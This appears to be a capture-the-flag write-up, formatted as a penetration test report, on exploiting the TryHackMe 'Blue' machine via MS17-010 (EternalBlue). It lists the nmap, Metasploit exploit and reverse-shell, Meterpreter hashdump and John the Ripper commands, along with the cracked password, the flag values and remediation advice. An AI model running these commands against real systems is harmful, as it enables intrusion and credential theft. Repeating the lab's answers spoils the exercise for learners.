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687E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Penetration Test Report – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00832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TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00832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Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D508EEE" w14:textId="4CF2274A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Justin Alexander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August 24, 2025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[Redacted]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687FC2F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5FE388BE">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E241A3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67FCC448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A penetration test was conducted against the target machine provided in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00832EB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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“Blue” room. The assessment simulated a real-world attacker leveraging known vulnerabilities to gain unauthorized access. The system was found to be vulnerable to the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MS17-010 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit, allowing remote code execution with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SYSTEM-level privileges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. Post-exploitation activities included credential extraction and retrieval of sensitive flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702F597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Risk Rating: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</w:p>
    <w:p w14:paraId="77949039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3701BB03">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DC9E7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E76BAD" w14:textId="032A1960" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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IP: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[REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A8DA4" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Identify vulnerabilities, gain access, escalate privileges, extract credentials, and capture flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B86C20" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Black-box approach, external attacker perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F18CD29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587041B2">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55837551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Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F388529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The test followed a structured penetration testing methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26593C7B" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Reconnaissance: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Network and service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871F235" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Enumeration: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Identify potential attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665A595" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Exploitation: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Gain initial access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148E262A" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Privilege Escalation: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Obtain administrative control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AD55A" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Post-Exploitation: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Credential harvesting, flag capture, and system analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B7AB19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6595412C">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="282BA9E9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Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E222297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 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95D79D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Nmap scan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was performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D9D4C" w14:textId="32501B02" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-p- --script vuln -</w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F081871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</w:p>
    <w:p w14:paraId="349E8ADB" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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135/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(MS RPC) – open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141CB4D" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(NetBIOS) – open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421175A" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(SMB) – open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54898B05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Nmap vulnerability scripts indicated the system was vulnerable to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MS17-010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728EA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High (Remote Code Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D97AA4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29F22A53">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3042B30E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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBF2E3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Metasploit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832EB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit was executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560196ED" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1607DF3D" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470BD22B" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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exploit/windows/</w:t>
      </w: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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A9F81" w14:textId="288D1FF1" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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set RHOSTS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[REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015D037" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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payload windows/x64/shell/</w:t>
      </w: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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FE171DF" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA5213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Gained a reverse shell on the target system as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 AUTHORITY\SYSTEM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8B971D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4A4E76DC">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631292C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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07055D92" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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The shell was upgraded to a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Meterpreter session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for stability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E362AF" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832EB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post/multi/manage/</w:t>
      </w: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shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="754DB9B3" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832EB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SESSION &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D9F80C" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832EB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14:paraId="620DAD1D" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Verified privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B719B0" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832EB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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28613AD9" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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 AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B5C5E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Full administrative control of the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B34B33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3F32C56A">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58E78C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4.4 Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB7E829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Using Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5241F1" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27B8743F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Extracted NTLM hashes. Notably:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50697A" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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User: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Jon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB704C" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Hash successfully cracked using John the Ripper + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00832EB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RockYou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00832E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3FDA91" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832EB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--format=</w:t>
      </w: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--wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B0C70A" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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2E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alqfna22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0A6B9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Adversary can reuse credentials across environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B98C3C1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19CC5824">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9A6D98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Flag Retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B600D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Flags discovered in key system locations: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4516"/>
      </w:tblGrid>
      <w:tr w:rsidR="00832EB3" w:rsidRPr="00832EB3" w14:paraId="29ADC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081B5" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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28CABF5" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Flag Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00832EB3" w:rsidRPr="00832EB3" w14:paraId="0198F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D70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C:\</w:t>
            </w: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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B0617E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flag{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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access_the_machine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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832EB3" w:rsidRPr="00832EB3" w14:paraId="6681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B835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 Database (System32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18AAAB7D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flag{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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sam_database_elevated_access</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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832EB3" w:rsidRPr="00832EB3" w14:paraId="793C4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72B0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 Documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072D8B0E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flag{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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admin_documents_can_be_valuable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00832E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18488F34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4F5E0E61">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA83A6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147"/>
        <w:gridCol w:w="4374"/>
        <w:gridCol w:w="1183"/>
      </w:tblGrid>
      <w:tr w:rsidR="00832EB3" w:rsidRPr="00832EB3" w14:paraId="5DC3B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95544" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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7998E2FF" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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794953E8" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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D24F47A" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00832EB3" w:rsidRPr="00832EB3" w14:paraId="154F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7FFC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MS17-010 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1EB73E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268B76B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system compromise (RCE as SYSTEM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26513AF2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832EB3" w:rsidRPr="00832EB3" w14:paraId="27DD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9182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Credentials (Jon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71AAE212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AFAF12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Reuse attacks / privilege abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45DC19FC" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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2E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7D6504E7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665A8D02">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="277A11E6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Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D6153" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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 Management: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Apply Microsoft’s </w:t>
      </w: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MS17-010 security update</w:t>
      </w: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to prevent exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B6C8B" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Hardening:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FDD99" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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Restrict SMB access to trusted hosts only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC50CE7" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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Disable SMBv1 across the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658CB6FC" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254BCCF" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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Enforce strong password policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DC342D" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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Implement multi-factor authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CAA088" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832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Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D3063" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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Enable SIEM alerts for SMB exploitation attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B61B88" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="00832E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>Monitor for abnormal processes and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4B1AE0" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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pict w14:anchorId="3AE0638A">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5307D8" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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2F60EF11" w14:textId="77777777" w:rsidR="00832EB3" w:rsidRPr="00832EB3" w:rsidRDefault="00832EB3" w:rsidP="0083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EB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment revealed that the target system was critically vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00832EB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00832EB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, allowing complete compromise. In a real enterprise environment, such a weakness would pose significant risk to confidentiality, integrity, and availability of business operations. Implementing the recommended mitigations is essential to reduce exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1456E8" w14:textId="77777777" w:rsidR="002613C9" w:rsidRDefault="002613C9"/>
    <w:sectPr w:rsidR="00261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C5F83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8F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D4B00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2698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0363E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3130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E828E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27D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857F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D57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21493"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20E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08965">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1933737772">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1098252547">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2053727878">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2080127948">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1239242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B3"/>
    <w:rsid w:val="00044F88"/>
    <w:rsid w:val="00213F08"/>
    <w:rsid w:val="002613C9"/>
    <w:rsid w:val="002F1A20"/>
    <w:rsid w:val="00440660"/>
    <w:rsid w:val="00782360"/>
    <w:rsid w:val="00832EB3"/>
    <w:rsid w:val="00893E3F"/>
    <w:rsid w:val="00FC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9B9D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D54A1CF3-7BB8-473C-8AF2-AA34356B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Alexander</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Justin Alexander</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-24T20:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-24T20:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>